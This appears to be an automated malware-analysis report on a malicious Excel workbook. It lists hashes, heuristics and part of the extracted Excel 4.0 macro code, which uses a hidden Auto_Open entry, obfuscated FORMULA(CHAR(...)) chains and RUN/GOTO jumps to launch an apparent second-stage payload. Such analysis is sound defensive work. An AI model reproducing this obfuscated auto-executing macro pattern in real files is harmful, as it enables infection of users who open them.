Office (OLE) malware analysis — malicious · a48659be7efbca57

MALICIOUS

Office (OLE)

232.0 KB Created: 2020-05-15 06:57:10 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 7987575c378815d1bbe0fc8997aa3bed SHA-1: 6a3236e5e959e1ffcaf7cd01b510bacbf7f82588 SHA-256: a48659be7efbca579e3a2dbdc9f7802169ab1b59bc69dbc2fb7bc666a39e44a6

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains critical heuristics indicating the presence of obfuscated Excel 4.0 macros designed to auto-execute. The 'Obfuscated XLM Auto_Open execution chain' heuristic specifically points to a chain involving RUN, FORMULA(CHAR), and state-transfer functions, suggesting an attempt to download or execute a secondary payload. The Auto_Open defined name further confirms the malicious intent of automatic execution upon opening the workbook.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 128376 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	128376 bytes
SHA-256: `a3fe58607f3f00bf059a1e02c0ee922324ecb2c4a9eb1b358131bd61137fc994`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!P46643 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,K34,"",-491.00000000000000000000 ' Sheet,IB40,"",-655.80062499999996816769 ' Sheet,BS73,"",-0.32894736842105265495 ' Sheet,HW144,"",1.58640326628895178551 ' Sheet,CP196,"",-38.60001953124999829470 ' Sheet,BP197,"",-2657.00000000000000000000 ' Sheet,IK198,"",-3.42727272727272724850 ' Sheet,GM212,"FORMULA(CHAR(BV51160-EL44926)&CHAR(FS48643X39330)&CHAR(CH53051BZ12779)&CHAR(DL34477FW42489)&CHAR(FX618-EX59522)&CHAR(DA11859+DS17686)&CHAR(B43577/FK35976)&CHAR(FS48643+CS51236)&CHAR(FX618-JM27920)&CHAR(FI5525/BP47091)&CHAR(BV51160-ET64659)&CHAR(L56301-BA36063)&CHAR(DL34477-HC34642)&CHAR(DA11859-BM34775)&CHAR(BV51160-IX16035)&CHAR(FS48643BX38849)&CHAR(J58820-IF40036)&CHAR(B43577-DH63674)&CHAR(FI5525IW53818)&CHAR(CH53051+BS49612)&CHAR(CH53051ER10277)&CHAR(FS48643GM63677),GM213)","" ' Sheet,GM214,GOTO(BR21297),"" ' Sheet,DO249,"",0.01983471074380165067 ' Sheet,HO308,"",0.38791208791208786621 ' Sheet,DO342,"",-111.60007812499999602096 ' Sheet,ES378,"",-0.25994694960212200163 ' Sheet,CW380,"",-0.31140350877192984891 ' Sheet,GA382,"",1.24645892351274789611 ' Sheet,JJ427,"",-323.00000000000000000000 ' Sheet,IT432,"",5.70000000000000284217 ' Sheet,W438,"",113.00000000000000000000 ' Sheet,FH463,"",118.00000000000000000000 ' Sheet,CK476,"",-570.00000000000000000000 ' Sheet,DS478,"",2663.00000000000000000000 ' Sheet,Y488,"",-607.00000000000000000000 ' Sheet,EI645,"",-2621.00000000000000000000 ' Sheet,JU687,"",663.80062499999996816769 ' Sheet,IQ736,"",5.30000488281249992895 ' Sheet,EZ744,"",6.31343283582089576100 ' Sheet,BK761,"",-122.00000000000000000000 ' Sheet,CN790,"FORMULA(CHAR(DB52227-FH15161)&CHAR(CY63948+FN47385)&CHAR(HU7788+FK4332)&CHAR(HP56389/Y28644)&CHAR(DB52227/FP52164)&CHAR(DB52227JG53047)&CHAR(CY63948/GM44964)&CHAR(IU7632+JT49711)&CHAR(DB52227/E53712)&CHAR(HP56389-FH29322)&CHAR(JS13255/EI47903)&CHAR(DB52227-HW15326)&CHAR(BJ54815-FG16834)&CHAR(HP56389/FE32280)&CHAR(ES35206GA49755)&CHAR(IU7632BB15233)&CHAR(EO33249+GK31061)&CHAR(BJ54815-W11153)&CHAR(IU7632-EQ37745)&CHAR(ES35206IW16832)&CHAR(ES35206/GB23483)&CHAR(HP56389+GY51451)&CHAR(IU7632+FN63942)&CHAR(EO33249FK19737)&CHAR(HU7788BX19388)&CHAR(DB52227+JU687)&CHAR(CY63948+FT33909)&CHAR(CA61921/JO23431)&CHAR(BJ54815FI23120)&CHAR(IU7632+CV21559)&CHAR(HP56389-EY41281)&CHAR(DB52227-FS59495)&CHAR(CA61921JM59538)&CHAR(JS13255-JK35711)&CHAR(DB52227+EP6572)&CHAR(BJ54815+ES58613)&CHAR(ES35206BR31022)&CHAR(EO33249-GF20723)&CHAR(HP56389+BG42278)&CHAR(CY63948CZ9520)&CHAR(HU7788/EI59257)&CHAR(HP56389+HR36210)&CHAR(EO33249/CF3888)&CHAR(HU7788EP1653)&CHAR(ES35206+DP21660)&CHAR(CY63948HS52465)&CHAR(CA61921/EM44985)&CHAR(HP56389+IK6052)&CHAR(DB52227-DB17080)&CHAR(BJ54815-CP8746)&CHAR(HU7788+HM39520)&CHAR(IU7632GH53966)&CHAR(ES35206+FJ10505)&CHAR(IU7632-IE5462)&CHAR(JS13255-EK8961)&CHAR(EO33249-JR12399)&CHAR(JS13255+IH39372)&CHAR(CY63948-EM27911)&CHAR(BJ54815-HZ24422)&CHAR(ES35206CW58543)&CHAR(HU7788JC60281)&CHAR(CA61921/ED63736)&CHAR(EO33249-EZ58062)&CHAR(EO33249/GH57788)&CHAR(JS13255+FX16864)&CHAR(IU7632-JJ52763)&CHAR(HU7788/S27447)&CHAR(CY63948/FF39573)&CHAR(HU7788/BT7690)&CHAR(CY63948EK53690)&CHAR(BJ54815+CQ61214)&CHAR(JS13255/BP14424)&CHAR(CA61921+BP19068)&CHAR(HP56389CZ65153)&CHAR(HU7788HB35462)&CHAR(JS13255/BQ6532)&CHAR(BJ54815+FO14519)&CHAR(BJ54815-ER11568)&CHAR(JS13255DC9149)&CHAR(CY63948+IK35781)&CHAR(JS13255-R26308)&CHAR(HP56389/JH58797)&CHAR(CY63948-J64437)&CHAR(HU7788-FB46785)&CHAR(EO33249/EE24987)&CHAR(EO33249*P55652)&CHAR(BJ54815-E14026),DU63479)","" ' Sheet,CN791,RUN(I55315),"" ' Sheet,BZ809,"",-222.50000000000000000000 ' Sheet,ID838,"",6 ... (truncated)

SHA-256: a3fe58607f3f00bf059a1e02c0ee922324ecb2c4a9eb1b358131bd61137fc994

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!P46643 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,K34,"",-491.00000000000000000000
'  Sheet,IB40,"",-655.80062499999996816769
'  Sheet,BS73,"",-0.32894736842105265495
'  Sheet,HW144,"",1.58640326628895178551
'  Sheet,CP196,"",-38.60001953124999829470
'  Sheet,BP197,"",-2657.00000000000000000000
'  Sheet,IK198,"",-3.42727272727272724850
'  Sheet,GM212,"FORMULA(CHAR(BV51160-EL44926)&CHAR(FS48643*X39330)&CHAR(CH53051*BZ12779)&CHAR(DL34477*FW42489)&CHAR(FX618-EX59522)&CHAR(DA11859+DS17686)&CHAR(B43577/FK35976)&CHAR(FS48643+CS51236)&CHAR(FX618-JM27920)&CHAR(FI5525/BP47091)&CHAR(BV51160-ET64659)&CHAR(L56301-BA36063)&CHAR(DL34477-HC34642)&CHAR(DA11859-BM34775)&CHAR(BV51160-IX16035)&CHAR(FS48643*BX38849)&CHAR(J58820-IF40036)&CHAR(B43577-DH63674)&CHAR(FI5525*IW53818)&CHAR(CH53051+BS49612)&CHAR(CH53051*ER10277)&CHAR(FS48643*GM63677),GM213)",""
'  Sheet,GM214,GOTO(BR21297),""
'  Sheet,DO249,"",0.01983471074380165067
'  Sheet,HO308,"",0.38791208791208786621
'  Sheet,DO342,"",-111.60007812499999602096
'  Sheet,ES378,"",-0.25994694960212200163
'  Sheet,CW380,"",-0.31140350877192984891
'  Sheet,GA382,"",1.24645892351274789611
'  Sheet,JJ427,"",-323.00000000000000000000
'  Sheet,IT432,"",5.70000000000000284217
'  Sheet,W438,"",113.00000000000000000000
'  Sheet,FH463,"",118.00000000000000000000
'  Sheet,CK476,"",-570.00000000000000000000
'  Sheet,DS478,"",2663.00000000000000000000
'  Sheet,Y488,"",-607.00000000000000000000
'  Sheet,EI645,"",-2621.00000000000000000000
'  Sheet,JU687,"",663.80062499999996816769
'  Sheet,IQ736,"",5.30000488281249992895
'  Sheet,EZ744,"",6.31343283582089576100
'  Sheet,BK761,"",-122.00000000000000000000
'  Sheet,CN790,"FORMULA(CHAR(DB52227-FH15161)&CHAR(CY63948+FN47385)&CHAR(HU7788+FK4332)&CHAR(HP56389/Y28644)&CHAR(DB52227/FP52164)&CHAR(DB52227*JG53047)&CHAR(CY63948/GM44964)&CHAR(IU7632+JT49711)&CHAR(DB52227/E53712)&CHAR(HP56389-FH29322)&CHAR(JS13255/EI47903)&CHAR(DB52227-HW15326)&CHAR(BJ54815-FG16834)&CHAR(HP56389/FE32280)&CHAR(ES35206*GA49755)&CHAR(IU7632*BB15233)&CHAR(EO33249+GK31061)&CHAR(BJ54815-W11153)&CHAR(IU7632-EQ37745)&CHAR(ES35206*IW16832)&CHAR(ES35206/GB23483)&CHAR(HP56389+GY51451)&CHAR(IU7632+FN63942)&CHAR(EO33249*FK19737)&CHAR(HU7788*BX19388)&CHAR(DB52227+JU687)&CHAR(CY63948+FT33909)&CHAR(CA61921/JO23431)&CHAR(BJ54815*FI23120)&CHAR(IU7632+CV21559)&CHAR(HP56389-EY41281)&CHAR(DB52227-FS59495)&CHAR(CA61921*JM59538)&CHAR(JS13255-JK35711)&CHAR(DB52227+EP6572)&CHAR(BJ54815+ES58613)&CHAR(ES35206*BR31022)&CHAR(EO33249-GF20723)&CHAR(HP56389+BG42278)&CHAR(CY63948*CZ9520)&CHAR(HU7788/EI59257)&CHAR(HP56389+HR36210)&CHAR(EO33249/CF3888)&CHAR(HU7788*EP1653)&CHAR(ES35206+DP21660)&CHAR(CY63948*HS52465)&CHAR(CA61921/EM44985)&CHAR(HP56389+IK6052)&CHAR(DB52227-DB17080)&CHAR(BJ54815-CP8746)&CHAR(HU7788+HM39520)&CHAR(IU7632*GH53966)&CHAR(ES35206+FJ10505)&CHAR(IU7632-IE5462)&CHAR(JS13255-EK8961)&CHAR(EO33249-JR12399)&CHAR(JS13255+IH39372)&CHAR(CY63948-EM27911)&CHAR(BJ54815-HZ24422)&CHAR(ES35206*CW58543)&CHAR(HU7788*JC60281)&CHAR(CA61921/ED63736)&CHAR(EO33249-EZ58062)&CHAR(EO33249/GH57788)&CHAR(JS13255+FX16864)&CHAR(IU7632-JJ52763)&CHAR(HU7788/S27447)&CHAR(CY63948/FF39573)&CHAR(HU7788/BT7690)&CHAR(CY63948*EK53690)&CHAR(BJ54815+CQ61214)&CHAR(JS13255/BP14424)&CHAR(CA61921+BP19068)&CHAR(HP56389*CZ65153)&CHAR(HU7788*HB35462)&CHAR(JS13255/BQ6532)&CHAR(BJ54815+FO14519)&CHAR(BJ54815-ER11568)&CHAR(JS13255*DC9149)&CHAR(CY63948+IK35781)&CHAR(JS13255-R26308)&CHAR(HP56389/JH58797)&CHAR(CY63948-J64437)&CHAR(HU7788-FB46785)&CHAR(EO33249/EE24987)&CHAR(EO33249*P55652)&CHAR(BJ54815-E14026),DU63479)",""
'  Sheet,CN791,RUN(I55315),""
'  Sheet,BZ809,"",-222.50000000000000000000
'  Sheet,ID838,"",6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.